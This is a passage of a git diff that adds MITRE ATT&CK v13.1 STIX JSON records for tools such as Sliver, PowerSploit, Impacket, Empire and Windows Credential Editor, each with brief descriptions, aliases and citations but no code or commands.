"2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--11f8d7eb-1927-4806-9267-3a11d4d4d6be.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--11f8d7eb-1927-4806-9267-3a11d4d4d6be.json new file mode 100644 index 0000000000000000000000000000000000000000..355f04c984fb1e732b0c9a75e4c8a48b55951ef2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--11f8d7eb-1927-4806-9267-3a11d4d4d6be.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--9f6d1506-5f14-419c-8fec-8b2b051ea197", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-01-17T22:14:02.852Z", + "name": "Sliver", + "description": "[Sliver](https://attack.mitre.org/software/S0633) is an open source, cross-platform, red team command and control framework written in Golang.(Citation: Bishop Fox Sliver Framework August 2019)", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Achute Sharma, Keysight", + "Ayan Saha, Keysight" + ], + "x_mitre_aliases": [ + "Sliver" + ], + "type": "tool", + "id": "tool--11f8d7eb-1927-4806-9267-3a11d4d4d6be", + "created": "2021-07-30T15:43:17.770Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0633", + "external_id": "S0633" + }, + { + "source_name": "Bishop Fox Sliver Framework August 2019", + "description": "Kervella, R. (2019, August 4). Cross-platform General Purpose Implant Framework Written in Golang. Retrieved July 30, 2021.", + "url": "https://labs.bishopfox.com/tech-blog/sliver" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--1244e058-fa10-48cb-b484-0bcf671107ae.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--1244e058-fa10-48cb-b484-0bcf671107ae.json new file mode 100644 index 0000000000000000000000000000000000000000..fbf345beb2338f6bba5b430045f11d7614fc4afe --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--1244e058-fa10-48cb-b484-0bcf671107ae.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--7d1b2057-c2ab-4892-90d4-4a1bac8d3dd9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-14T19:27:39.308Z", + "name": "SILENTTRINITY", + "description": "[SILENTTRINITY](https://attack.mitre.org/software/S0692) is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in Powershell, C, and Boo. [SILENTTRINITY](https://attack.mitre.org/software/S0692) was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.(Citation: GitHub SILENTTRINITY March 2022)(Citation: Security Affairs SILENTTRINITY July 2019)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Daniel Acevedo, @darmad0, ARMADO" + ], + "x_mitre_aliases": [ + "SILENTTRINITY" + ], + "type": "tool", + "id": "tool--1244e058-fa10-48cb-b484-0bcf671107ae", + "created": "2022-03-23T19:34:30.486Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0692", + "external_id": "S0692" + }, + { + "source_name": "SILENTTRINITY", + "description": "(Citation: GitHub SILENTTRINITY March 2022)" + }, + { + "source_name": "Security Affairs SILENTTRINITY July 2019", + "description": "Paganini, P. (2019, July 7). Croatia government agencies targeted with news SilentTrinity malware. Retrieved March 23, 2022.", + "url": "https://securityaffairs.co/wordpress/88021/apt/croatia-government-silenttrinity-malware.html" + }, + { + "source_name": "GitHub SILENTTRINITY March 2022", + "description": "Salvati, M (2019, August 6). SILENTTRINITY. 
Retrieved March 23, 2022.", + "url": "https://github.com/byt3bl33d3r/SILENTTRINITY" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d.json new file mode 100644 index 0000000000000000000000000000000000000000..b94854ebc5aaf7e2ab02681cd265e57ba3af9c8a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--3acafd20-81d9-4d8d-bb5c-f7ce94af8142", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:12:48.213Z", + "name": "PowerSploit", + "description": "[PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework comprised of [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.6", + "x_mitre_aliases": [ + "PowerSploit" + ], + "type": "tool", + "id": "tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0194", + "external_id": "S0194" + }, + { + "source_name": "PowerShellMagazine PowerSploit July 2014", + "description": "Graeber, M. (2014, July 8). PowerSploit. Retrieved February 6, 2018.", + "url": "http://www.powershellmagazine.com/2014/07/08/powersploit/" + }, + { + "source_name": "GitHub PowerSploit May 2012", + "description": "PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018.", + "url": "https://github.com/PowerShellMafia/PowerSploit" + }, + { + "source_name": "PowerSploit Documentation", + "description": "PowerSploit. (n.d.). PowerSploit. 
Retrieved February 6, 2018.", + "url": "http://powersploit.readthedocs.io" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--242f3da3-4425-4d11-8f5c-b842886da966.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--242f3da3-4425-4d11-8f5c-b842886da966.json new file mode 100644 index 0000000000000000000000000000000000000000..4dd79f44322aea01ba65bbf8aa612defe7343810 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--242f3da3-4425-4d11-8f5c-b842886da966.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--88f14ed4-34c1-4bd9-8ab1-73051418dc7b", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Windows Credential Editor", + "WCE" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--242f3da3-4425-4d11-8f5c-b842886da966", + "type": "tool", + "created": "2017-05-31T21:32:12.684Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0005", + "external_id": "S0005" + }, + { + "source_name": "Amplia WCE", + "description": "Amplia Security. (n.d.). Windows Credentials Editor (WCE) F.A.Q.. Retrieved December 17, 2015.", + "url": "http://www.ampliasecurity.com/research/wcefaq.html" + } + ], + "modified": "2020-03-30T18:28:34.296Z", + "name": "Windows Credential Editor", + "description": "[Windows Credential Editor](https://attack.mitre.org/software/S0005) is a password dumping tool. (Citation: Amplia WCE)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--26c87906-d750-42c5-946c-d4162c73fc7b.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--26c87906-d750-42c5-946c-d4162c73fc7b.json new file mode 100644 index 0000000000000000000000000000000000000000..e91742ef1361541acda5b26c7a804f5f26785ac4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--26c87906-d750-42c5-946c-d4162c73fc7b.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--33fc9bcd-a710-4281-8e79-9a1374fd31ac", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-01-23T20:52:37.112Z", + "name": "Impacket", + "description": "[Impacket](https://attack.mitre.org/software/S0357) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://attack.mitre.org/software/S0357) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.(Citation: Impacket Tools)", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.4", + "x_mitre_contributors": [ + "Jacob Wilkin, Trustwave, SpiderLabs" + ], + "x_mitre_aliases": [ + "Impacket" + ], + "type": "tool", + "id": "tool--26c87906-d750-42c5-946c-d4162c73fc7b", + "created": "2019-01-31T01:39:56.283Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0357", + "external_id": "S0357" + }, + { + "source_name": "Impacket Tools", + "description": "SecureAuth. (n.d.). Retrieved January 15, 2019.", + "url": "https://www.secureauth.com/labs/open-source-tools/impacket" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--294e2560-bd48-44b2-9da2-833b5588ad11.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--294e2560-bd48-44b2-9da2-833b5588ad11.json new file mode 100644 index 0000000000000000000000000000000000000000..7edfa8177d0ca83e907330001537c547886a6fe3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--294e2560-bd48-44b2-9da2-833b5588ad11.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--29fef41d-e6eb-46db-a7d3-56282460b12c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T21:28:49.335Z", + "name": "ipconfig", + "description": "[ipconfig](https://attack.mitre.org/software/S0100) is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. (Citation: TechNet Ipconfig)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "ipconfig" + ], + "type": "tool", + "id": "tool--294e2560-bd48-44b2-9da2-833b5588ad11", + "created": "2017-05-31T21:33:02.863Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0100", + "external_id": "S0100" + }, + { + "source_name": "TechNet Ipconfig", + "description": "Microsoft. (n.d.). Ipconfig. Retrieved April 17, 2016.", + "url": "https://technet.microsoft.com/en-us/library/bb490921.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2c5281dd-b5fd-4531-8aea-c1bf8a0f8756.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2c5281dd-b5fd-4531-8aea-c1bf8a0f8756.json new file mode 100644 index 0000000000000000000000000000000000000000..660e8098844a9537467e913dd9b60b0b909baded --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2c5281dd-b5fd-4531-8aea-c1bf8a0f8756.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--46818440-51da-418a-970b-2ad195d29f0f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-15T00:59:18.335Z", + "name": "AADInternals", + "description": "[AADInternals](https://attack.mitre.org/software/S0677) is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.(Citation: AADInternals Github)(Citation: AADInternals Documentation)", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "AADInternals" + ], + "type": "tool", + "id": "tool--2c5281dd-b5fd-4531-8aea-c1bf8a0f8756", + "created": "2022-02-01T15:08:45.007Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0677", + "external_id": "S0677" + }, + { + "source_name": "AADInternals", + "description": "Dr. Nestori Syynimaa. (2018, October 25). AADInternals. Retrieved February 1, 2022.", + "url": "https://o365blog.com/aadinternals/" + }, + { + "source_name": "AADInternals Documentation", + "description": "Dr. Nestori Syynimaa. (2018, October 25). AADInternals. Retrieved February 18, 2022.", + "url": "https://o365blog.com/aadinternals" + }, + { + "source_name": "AADInternals Github", + "description": "Dr. Nestori Syynimaa. (2021, December 13). AADInternals. Retrieved February 1, 2022.", + "url": "https://github.com/Gerenios/AADInternals" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2e45723a-31da-4a7e-aaa6-e01998a6788f.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2e45723a-31da-4a7e-aaa6-e01998a6788f.json new file mode 100644 index 0000000000000000000000000000000000000000..9fec29455e95463242d3f201bcb84588503ab858 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2e45723a-31da-4a7e-aaa6-e01998a6788f.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--34b18408-90cb-4bbb-958f-72423d8264cf", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T21:30:23.536Z", + "name": "Tasklist", + "description": "The [Tasklist](https://attack.mitre.org/software/S0057) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. (Citation: Microsoft Tasklist)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "Tasklist" + ], + "type": "tool", + "id": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f", + "created": "2017-05-31T21:32:39.233Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0057", + "external_id": "S0057" + }, + { + "source_name": "Microsoft Tasklist", + "description": "Microsoft. (n.d.). Tasklist. Retrieved December 23, 2015.", + "url": "https://technet.microsoft.com/en-us/library/bb491010.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2fab555f-7664-4623-b4e0-1675ae38190b.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2fab555f-7664-4623-b4e0-1675ae38190b.json new file mode 100644 index 0000000000000000000000000000000000000000..94033a0db0bbbeacff54fa0890259f0afefacd06 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--2fab555f-7664-4623-b4e0-1675ae38190b.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--b80b76a9-fe0e-4dc6-a766-caef6905fd60", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Lslsass" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--2fab555f-7664-4623-b4e0-1675ae38190b", + "type": "tool", + "created": "2017-05-31T21:33:10.962Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0121", + "external_id": "S0121" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "modified": "2020-03-30T16:59:48.036Z", + "name": "Lslsass", + "description": "[Lslsass](https://attack.mitre.org/software/S0121) is a publicly-available tool that can dump active logon session password hashes from the lsass process. (Citation: Mandiant APT1)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--30489451-5886-4c46-90c9-0dff9adc5252.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--30489451-5886-4c46-90c9-0dff9adc5252.json new file mode 100644 index 0000000000000000000000000000000000000000..60359e3015c94d213663b9a0de57748b04a2271f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--30489451-5886-4c46-90c9-0dff9adc5252.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--b485e72b-1bd7-46ae-8dc7-02d42ce2509b", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Arp", + "arp.exe" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--30489451-5886-4c46-90c9-0dff9adc5252", + "type": "tool", + "created": "2017-05-31T21:33:02.428Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0099", + "external_id": "S0099" + }, + { + "source_name": "TechNet Arp", + "description": "Microsoft. (n.d.). Arp. Retrieved April 17, 2016.", + "url": "https://technet.microsoft.com/en-us/library/bb490864.aspx" + } + ], + "modified": "2021-12-07T18:27:04.603Z", + "name": "Arp", + "description": "[Arp](https://attack.mitre.org/software/S0099) displays and modifies information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--33b9e38f-103c-412d-bdcf-904a91fff1e4.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--33b9e38f-103c-412d-bdcf-904a91fff1e4.json new file mode 100644 index 0000000000000000000000000000000000000000..dddc046ed3c98eacdc28c3cb4db90d2dc1d380b7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--33b9e38f-103c-412d-bdcf-904a91fff1e4.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--42d9c4e8-3d61-4e98-be66-b2c9ac01d3c5", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "spwebmember" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--33b9e38f-103c-412d-bdcf-904a91fff1e4", + "type": "tool", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0227", + "external_id": "S0227" + }, + { + "source_name": "spwebmember", + "description": "(Citation: NCC Group APT15 Alive and Strong)" + }, + { + "source_name": "NCC Group APT15 Alive and Strong", + "description": "Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.", + "url": "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" + } + ], + "modified": "2021-03-29T19:54:46.007Z", + "name": "spwebmember", + "description": "[spwebmember](https://attack.mitre.org/software/S0227) is a Microsoft SharePoint enumeration and data dumping tool written in .NET. (Citation: NCC Group APT15 Alive and Strong)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3.json new file mode 100644 index 0000000000000000000000000000000000000000..c52558e498b68bdd73c2ccef9d20130ccda12787 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3.json 
@@ -0,0 +1,70 @@ +{ + "type": "bundle", + "id": "bundle--6d7998e9-70e9-4fcb-ac7b-18a0e570bec5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T03:43:09.336Z", + "name": "Empire", + "description": "[Empire](https://attack.mitre.org/software/S0363) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://attack.mitre.org/techniques/T1059/001) for Windows and Python for Linux/macOS. [Empire](https://attack.mitre.org/software/S0363) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.(Citation: NCSC Joint Report Public Tools)(Citation: Github PowerShell Empire)(Citation: GitHub ATTACK Empire)", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.6", + "x_mitre_aliases": [ + "Empire", + "EmPyre", + "PowerShell Empire" + ], + "type": "tool", + "id": "tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3", + "created": "2019-03-11T14:13:40.648Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0363", + "external_id": "S0363" + }, + { + "source_name": "EmPyre", + "description": "(Citation: Github PowerShell Empire)" + }, + { + "source_name": "PowerShell Empire", + "description": "(Citation: Github PowerShell Empire)" + }, + { + "source_name": "Github PowerShell Empire", + "description": "Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.", + "url": "https://github.com/PowerShellEmpire/Empire" + }, + { + "source_name": "GitHub ATTACK Empire", + "description": "Stepanic, D. (2018, September 2). 
attck_empire: Generate ATT&CK Navigator layer file from PowerShell Empire agent logs. Retrieved March 11, 2019.", + "url": "https://github.com/dstepanic/attck_empire" + }, + { + "source_name": "NCSC Joint Report Public Tools", + "description": "The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.", + "url": "https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5.json new file mode 100644 index 0000000000000000000000000000000000000000..bb4ea173497559272cd1c756ad477611c76f935f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5.json 
@@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--35e8b690-70f6-403f-9d0c-482c14761f97", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5", + "type": "tool", + "created": "2017-05-31T21:33:03.377Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0101", + "external_id": "S0101" + }, + { + "source_name": "Wikipedia Ifconfig", + "description": "Wikipedia. (2016, January 26). ifconfig. Retrieved April 17, 2016.", + "url": "https://en.wikipedia.org/wiki/Ifconfig" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "ifconfig", + "description": "[ifconfig](https://attack.mitre.org/software/S0101) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. (Citation: Wikipedia Ifconfig)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--38952eac-cb1b-4a71-bad2-ee8223a1c8fe.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--38952eac-cb1b-4a71-bad2-ee8223a1c8fe.json new file mode 100644 index 0000000000000000000000000000000000000000..2431ef0a2ef83f0db21428dcf3f862f7353a5d14 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--38952eac-cb1b-4a71-bad2-ee8223a1c8fe.json 
